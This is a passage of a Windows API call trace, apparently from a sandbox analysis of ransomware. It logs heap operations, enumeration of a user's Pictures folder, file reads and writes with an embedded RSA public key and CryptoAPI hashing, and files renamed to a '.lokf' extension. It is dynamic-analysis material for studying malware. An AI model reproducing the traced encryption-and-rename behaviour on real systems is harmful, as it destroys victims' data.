hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b4a8 | out: hHeap=0x660000) returned 1 [0059.154] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0059.154] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0059.154] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0059.154] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6acc8 [0059.154] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278ec0 [0059.154] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b4a8 [0059.154] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0059.154] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c6b490 [0059.154] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f70 [0059.154] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x326a688 [0059.154] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0059.154] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296560 [0059.154] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0059.154] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0059.154] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x32425c8 [0059.155] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0059.155] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0059.155] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b4a8 | out: hHeap=0x660000) returned 1 [0059.155] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0059.155] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b490 | out: hHeap=0x660000) returned 1 [0059.155] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0059.155] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0059.155] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0059.155] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.155] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0059.155] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c71640 | out: hHeap=0x660000) returned 1 [0059.155] GetCurrentThreadId () returned 0x9e0 [0059.155] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f4e8 [0059.155] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c7de38 [0059.155] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0059.155] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8720 [0059.155] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0059.155] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0059.155] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0059.155] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0059.155] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.155] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.155] GetCurrentThreadId () returned 0x9e0 [0059.155] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.155] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.155] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0059.155] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.155] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.155] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.155] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.155] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0059.155] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0059.155] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0059.155] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261058 [0059.155] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0059.156] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0059.156] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0059.156] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6acc8 [0059.156] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.156] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0059.156] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0059.156] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0059.156] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0059.156] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0059.156] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0059.156] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0059.156] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b490 [0059.156] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0059.156] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f00 [0059.156] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.156] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0059.156] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0059.156] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0059.156] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0059.156] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b4a8 [0059.156] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0059.156] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0059.156] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0059.156] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b478 [0059.156] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0059.156] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ac68 [0059.156] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.156] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f40 [0059.156] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.156] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad10 [0059.156] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.156] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad40 [0059.156] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0059.156] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b4c0 [0059.156] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0059.157] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ad10 [0059.157] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad40 | out: hHeap=0x660000) returned 1 [0059.157] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0059.157] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0059.157] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0059.157] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0059.157] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0059.157] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b490 | out: hHeap=0x660000) returned 1 [0059.157] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b490 [0059.157] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0059.157] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c71640 [0059.157] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0059.157] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0059.157] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0059.157] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xf484, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.157] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.157] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f4e8 | out: hHeap=0x660000) returned 1 [0059.157] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.158] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.158] CloseHandle (hObject=0x5cc) returned 1 [0059.159] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\hsPblQOgWlR.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hspblqogwlr.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\hsPblQOgWlR.jpg.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hspblqogwlr.jpg.lokf")) returned 1 [0059.159] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.159] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.159] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.160] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3289860 | out: hHeap=0x660000) returned 1 [0059.160] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99b535f0, ftCreationTime.dwHighDateTime=0x1d4c620, ftLastAccessTime.dwLowDateTime=0xf05a3ac0, ftLastAccessTime.dwHighDateTime=0x1d4c8e8, ftLastWriteTime.dwLowDateTime=0xf05a3ac0, ftLastWriteTime.dwHighDateTime=0x1d4c8e8, nFileSizeHigh=0x0, nFileSizeLow=0x99d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IIQQGpJ.gif", cAlternateFileName="")) returned 1 [0059.160] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IIQQGpJ.gif") returned=".gif" [0059.160] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IIQQGpJ.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iiqqgpj.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.160] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=39383) returned 1 [0059.160] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.163] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x99b1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.163] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.163] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x99d7, lpOverlapped=0x0) returned 1 [0059.164] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.164] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.164] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.164] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8720) returned 1 [0059.164] CryptCreateHash (in: hProv=0x6b8720, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.164] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.165] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.165] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.165] GetLastError () returned 0x0 [0059.165] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.165] CryptReleaseContext (hProv=0x6b8720, dwFlags=0x0) returned 1 [0059.165] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.165] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.165] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.165] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.165] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.165] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c71640 [0059.165] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0059.165] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b4a8 | out: hHeap=0x660000) returned 1 [0059.165] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b4c0 | out: hHeap=0x660000) returned 1 [0059.165] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0059.165] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0059.165] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0059.165] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac68 [0059.165] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278e90 [0059.165] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b4c0 [0059.165] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0059.165] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c6b4a8 [0059.165] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f30 [0059.165] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x326a688 [0059.165] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0059.165] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0059.165] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0059.166] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0059.166] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242348 [0059.166] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0059.166] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0059.166] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b4c0 | out: hHeap=0x660000) returned 1 [0059.166] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0059.166] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b4a8 | out: hHeap=0x660000) returned 1 [0059.166] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0059.166] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0059.166] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0059.166] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.166] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296560 | out: hHeap=0x660000) returned 1 [0059.166] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c71640 | out: hHeap=0x660000) returned 1 [0059.166] GetCurrentThreadId () returned 0x9e0 [0059.166] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f4e8 [0059.166] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c7dec8 [0059.166] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0059.166] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8720 [0059.166] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0059.166] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0059.166] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0059.166] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0059.166] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.166] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.166] GetCurrentThreadId () returned 0x9e0 [0059.166] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.166] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.166] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0059.166] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.166] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.166] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.166] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.166] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0059.166] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0059.166] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0059.166] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261058 [0059.167] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0059.167] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0059.167] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0059.167] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac68 [0059.167] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0059.167] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0059.167] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0059.167] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0059.167] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0059.167] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0059.167] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0059.167] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0059.167] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b4a8 [0059.167] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0059.167] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f50 [0059.167] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0059.167] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0059.167] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0059.167] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0059.167] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0059.167] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b4c0 [0059.167] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0059.167] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0059.167] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0059.167] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b490 [0059.167] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0059.167] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ad10 [0059.167] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0059.167] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f70 [0059.167] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 